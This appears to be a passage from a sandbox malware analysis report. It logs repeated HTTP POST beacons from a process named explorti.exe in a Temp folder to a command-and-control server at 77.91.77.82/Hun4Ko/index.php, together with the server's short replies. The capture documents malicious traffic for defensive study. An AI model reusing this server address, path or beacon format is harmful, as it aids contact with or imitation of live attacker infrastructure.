                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:48.487576008 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      42192.168.2.44977977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:48.599514961 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:49.316119909 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:49.324702978 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:49.549006939 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      43192.168.2.44978077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:49.662600040 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:50.367059946 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:50.367883921 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:50.593066931 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      44192.168.2.44978177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:50.709145069 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:51.435992002 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:51.437042952 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:51.666424990 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      45192.168.2.44978277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:51.788824081 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:52.480038881 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:52.480732918 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:52.696753025 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      46192.168.2.44978377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:52.819797993 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:53.517738104 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:53.518513918 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:53.736146927 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      47192.168.2.44978477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:53.854063034 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:54.556082964 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:54.556777000 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:54.776498079 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:54 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      48192.168.2.44978577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:54.899787903 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:55.588839054 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:55.589754105 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:55.808339119 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:55 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      49192.168.2.44978777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:55.927670002 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:56.631823063 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:56.632620096 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:56.857908964 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:56 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      50192.168.2.44978877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:56.976218939 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:57.691664934 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:57.692564011 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:57.913322926 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:57 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      51192.168.2.44978977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:58.021557093 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:58.723642111 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:58.724581003 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:16:58.949104071 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:58 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      52192.168.2.44979077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:16:59.263988018 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:16:59.986711979 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:16:59 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:16:59.987401962 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:00.214999914 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      53192.168.2.44979177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:00.337069035 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:01.052843094 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:00 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:01.054259062 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
